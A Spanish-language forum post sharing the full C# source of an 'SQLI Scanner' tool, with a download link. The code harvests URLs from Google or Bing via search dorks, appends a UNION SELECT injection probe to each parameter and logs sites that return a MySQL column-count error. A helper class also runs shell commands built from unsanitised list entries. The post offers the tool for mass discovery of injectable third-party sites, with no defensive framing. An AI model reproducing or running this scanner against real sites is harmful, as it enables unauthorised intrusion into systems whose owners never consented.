Un simple programa en C# para buscar paginas vulnerables a SQLI usando Google o Bing.
Una imagen :
(http://doddyhackman.webcindario.com/images/sqliscannercsharp.jpg)
Los codigos :
Form1.cs
// SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Text.RegularExpressions;
namespace SQLI_Scanner
{
public partial class Form1 : Form
{
public Form1()
{
InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
listBox1.Items.Clear();
DH_Tools tools = new DH_Tools();
funciones funcion = new funciones();
toolStripStatusLabel1.Text = "[+] Searching ...";
this.Refresh();
List<string> urls = new List<string> { };
if (comboBox1.Text == "Bing")
{
urls = funcion.bingsearch(textBox1.Text, textBox2.Text);
urls = tools.repes(tools.cortar(urls));
}
else
{
urls = funcion.googlesearch(textBox1.Text, textBox2.Text);
urls = tools.repes(tools.cortar(urls));
}
foreach (string url in urls)
{
listBox1.Items.Add(url);
}
if (listBox1.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
toolStripStatusLabel1.Text = "[+] Search finished";
this.Refresh();
}
private void button2_Click(object sender, EventArgs e)
{
toolStripStatusLabel1.Text = "[+] Scanning ...";
this.Refresh();
listBox2.Items.Clear();
DH_Tools tools = new DH_Tools();
String url = "";
String code = "";
List<string> urls_to_scan = new List<string> { };
foreach (object write in listBox1.Items)
{
urls_to_scan.Add(write.ToString());
}
if (listBox1.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
else
{
foreach (string page in urls_to_scan)
{
toolStripStatusLabel1.Text = "[+] Checking : "+page;
this.Refresh();
code = tools.toma(page + "-1+union+select+666--");
Match regex = Regex.Match(code, "The used SELECT statements have a different number of columns", RegexOptions.IgnoreCase);
if (regex.Success)
{
listBox2.Items.Add(page);
tools.savefile("sqli-logs.txt", page);
}
}
if (listBox2.Items.Count == 0)
{
MessageBox.Show("Not Found");
}
}
toolStripStatusLabel1.Text = "[+] Scan Finished";
this.Refresh();
}
private void button3_Click(object sender, EventArgs e)
{
DH_Tools tools = new DH_Tools();
if (File.Exists("sqli-logs.txt"))
{
tools.console("sqli-logs.txt");
}
else
{
MessageBox.Show("Logs not found");
}
}
private void button4_Click(object sender, EventArgs e)
{
Application.Exit();
}
private void listBox1_DoubleClick(object sender, EventArgs e)
{
DH_Tools tools = new DH_Tools();
tools.console("start "+listBox1.SelectedItem.ToString());
}
private void listBox2_DoubleClick(object sender, EventArgs e)
{
DH_Tools tools = new DH_Tools();
tools.console("start " + listBox2.SelectedItem.ToString());
}
}
}
// The End ?
funciones.cs
// Funciones para SQLI Scanner 0.4
// (C) Doddy Hackman 2014
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.Text.RegularExpressions;
using System.Web;
namespace SQLI_Scanner
{
class funciones
{
public List<String> bingsearch(string dork, string cantidad)
{
String code = "";
Int16 num = 0;
//String dork = "index.php+id";
//String cantidad = "20";
String url_cortar = "";
String url_final = "";
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
List<string> urls = new List<string> { };
for (num = 10; num <= Convert.ToInt16(cantidad); num += 10)
{
code = nave.DownloadString("http://www.bing.com/search?q=" + dork + "&first=" + num);
Match regex1 = Regex.Match(code, "<h3><a href=\"(.*?)\"", RegexOptions.IgnoreCase);
while (regex1.Success)
{
url_cortar = regex1.Groups[1].Value;
Match regex2 = Regex.Match(url_cortar, "(.*?)=(.*?)", RegexOptions.IgnoreCase);
if (regex2.Success)
{
url_final = regex2.Groups[1].Value + "=";
urls.Add(url_final);
}
regex1 = regex1.NextMatch();
}
}
return urls;
}
public List<String> googlesearch(string dork, string paginas)
{
String code = "";
Int16 num = 0;
String lineafinale = "";
String leer = "";
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
List<string> urlsgoogle = new List<string> { };
for (num = 10; num <= Convert.ToInt16(paginas); num += 10)
{
code = nave.DownloadString("http://www.google.com/search?hl=&q=" + dork + "&start=" + num);
Match regex = Regex.Match(code, "(?<=\"r\"><. href=\")(.+?)\"", RegexOptions.IgnoreCase);
while (regex.Success)
{
leer = Uri.UnescapeDataString(regex.Groups[1].Value);
Match cortada = Regex.Match(leer, @"\/url\?q\=(.*?)\&\;", RegexOptions.IgnoreCase);
if (cortada.Success)
{
lineafinale = cortada.Groups[1].Value;
}
else
{
lineafinale = leer;
}
urlsgoogle.Add(lineafinale);
regex = regex.NextMatch();
}
}
return urlsgoogle;
}
}
}
// The End ?
DH_Tools.cs
// Class Name : DH Tools
// Version : Beta
// Author : Doddy Hackman
// (C) Doddy Hackman 2014
//
// Functions :
//
// [+] HTTP Methods GET & POST
// [+] Get HTTP Status code number
// [+] HTTP FingerPrinting
// [+] Read File
// [+] Write File
// [+] GET OS
// [+] Remove duplicates from a List
// [+] Cut urls from a List
// [+] Download
// [+] Upload
// [+] Get Basename from a path
// [+] Execute commands
// [+] URI Split
// [+] MD5 Hash Generator
// [+] Get MD5 of file
// [+] Get IP address from host name
//
// Credits :
//
// Method POST -> https://technet.rapaport.com/Info/Prices/SampleCode/Full_Example.aspx
// Method GET -> http://stackoverflow.com/questions/4510212/how-i-can-get-web-pages-content-and-save-it-into-the-string-variable
// HTTP Headers -> http://msdn.microsoft.com/en-us/library/system.net.httpwebresponse.headers%28v=vs.110%29.aspx
// List Cleaner -> http://forums.asp.net/t/1318899.aspx?Remove+duplicate+items+from+List+String+
// Execute command -> http://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C
// MD5 Hash Generator -> http://www.java2s.com/Code/CSharp/Security/GetandverifyMD5Hash.htm
// Get MD5 of file -> http://stackoverflow.com/questions/10520048/calculate-md5-checksum-for-a-file
//
// Thanks to : $DoC and atheros14 (Forum indetectables)
//
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Text.RegularExpressions;
using System.Security.Cryptography;
namespace SQLI_Scanner
{
class DH_Tools
{
public string toma(string url)
{
string code = "";
try
{
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
code = nave.DownloadString(url);
}
catch
{
//
}
return code;
}
public string tomar(string url, string par)
{
string code = "";
try
{
HttpWebRequest nave = (HttpWebRequest)
WebRequest.Create(url);
nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
nave.Method = "POST";
nave.ContentType = "application/x-www-form-urlencoded";
Stream anteantecode = nave.GetRequestStream();
anteantecode.Write(Encoding.ASCII.GetBytes(par), 0, Encoding.ASCII.GetBytes(par).Length);
anteantecode.Close();
StreamReader antecode = new StreamReader(nave.GetResponse().GetResponseStream());
code = antecode.ReadToEnd();
}
catch
{
//
}
return code;
}
public string respondecode(string url)
{
String code = "";
try
{
HttpWebRequest nave = (HttpWebRequest)WebRequest.Create(url);
nave.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
HttpWebResponse num = (HttpWebResponse)nave.GetResponse();
int number = (int)num.StatusCode;
code = Convert.ToString(number);
}
catch
{
code = "404";
}
return code;
}
public string httpfinger(string url)
{
String code = "";
try
{
HttpWebRequest nave1 = (HttpWebRequest)WebRequest.Create(url);
HttpWebResponse nave2 = (HttpWebResponse)nave1.GetResponse();
for (int num = 0; num < nave2.Headers.Count; ++num)
{
code = code + "[+] " + nave2.Headers.Keys[num] + ":" + nave2.Headers[num] + Environment.NewLine;
}
nave2.Close();
}
catch
{
//
}
return code;
}
public string openword(string file)
{
String code = "";
try
{
code = System.IO.File.ReadAllText(file);
}
catch
{
//
}
return code;
}
public void savefile(string file, string texto)
{
try
{
System.IO.StreamWriter save = new System.IO.StreamWriter(file, true);
save.Write(texto);
save.Close();
}
catch
{
//
}
}
public string getos()
{
string code = "";
try
{
System.OperatingSystem os = System.Environment.OSVersion;
code = Convert.ToString(os);
}
catch
{
code = "?";
}
return code;
}
public List<string> repes(List<string> array)
{
List<string> repe = new List<string>();
foreach (string lin in array)
{
if (!repe.Contains(lin))
{
repe.Add(lin);
}
}
return repe;
}
public List<string> cortar(List<string> otroarray)
{
List<string> cort = new List<string>();
foreach (string row in otroarray)
{
String lineafinal = "";
Match regex = Regex.Match(row, @"(.*)\?(.*)=(.*)", RegexOptions.IgnoreCase);
if (regex.Success)
{
lineafinal = regex.Groups[1].Value + "?" + regex.Groups[2].Value + "=";
cort.Add(lineafinal);
}
}
return cort;
}
public string download(string url, string savename)
{
String code = "";
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
try
{
nave.DownloadFile(url, savename);
code = "OK";
}
catch
{
code = "Error";
}
return code;
}
public string upload(string link, string archivo)
{
String code = "";
try
{
WebClient nave = new WebClient();
nave.Headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0";
byte[] codedos = nave.UploadFile(link, "POST", archivo);
code = System.Text.Encoding.UTF8.GetString(codedos, 0, codedos.Length);
}
catch
{
code = "Error";
}
return code;
}
public string basename(string file)
{
String nombre = "";
FileInfo basename = new FileInfo(file);
nombre = basename.Name;
return nombre;
}
public string console(string cmd)
{
string code = "";
try
{
System.Diagnostics.ProcessStartInfo loadnow = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
loadnow.RedirectStandardOutput = true;
loadnow.UseShellExecute = false;
loadnow.CreateNoWindow = true;
System.Diagnostics.Process loadnownow = new System.Diagnostics.Process();
loadnownow.StartInfo = loadnow;
loadnownow.Start();
code = loadnownow.StandardOutput.ReadToEnd();
}
catch
{
code = "Error";
}
return code;
}
public string urisplit(string url, string opcion)
{
string code = "";
Uri dividir = new Uri(url);
if (opcion == "host")
{
code = dividir.Host;
}
if (opcion == "port")
{
code = Convert.ToString(dividir.Port);
}
if (opcion == "path")
{
code = dividir.LocalPath;
}
if (opcion == "file")
{
code = dividir.AbsolutePath;
FileInfo basename = new FileInfo(code);
code = basename.Name;
}
if (opcion == "query")
{
code = dividir.Query;
}
if (opcion == "")
{
code = "Error";
}
return code;
}
public string convertir_md5(string text)
{
MD5 convertirmd5 = MD5.Create();
byte[] infovalor = convertirmd5.ComputeHash(Encoding.Default.GetBytes(text));
StringBuilder guardar = new StringBuilder();
for (int numnow = 0; numnow < infovalor.Length; numnow++)
{
guardar.Append(infovalor[numnow].ToString("x2"));
}
return guardar.ToString();
}
public string md5file(string file)
{
string code = "";
try
{
var gen = MD5.Create();
var ar = File.OpenRead(file);
code = BitConverter.ToString(gen.ComputeHash(ar)).Replace("-", "").ToLower();
}
catch
{
code = "Error";
}
return code;
}
public string getip(string host)
{
string code = "";
try
{
IPAddress[] find = Dns.GetHostAddresses(host);
code = find[0].ToString();
}
catch
{
code = "Error";
}
return code;
}
}
}
// The End ?
Si lo quieren bajar lo pueden hacer de aca (https://sourceforge.net/projects/sqliscanner/).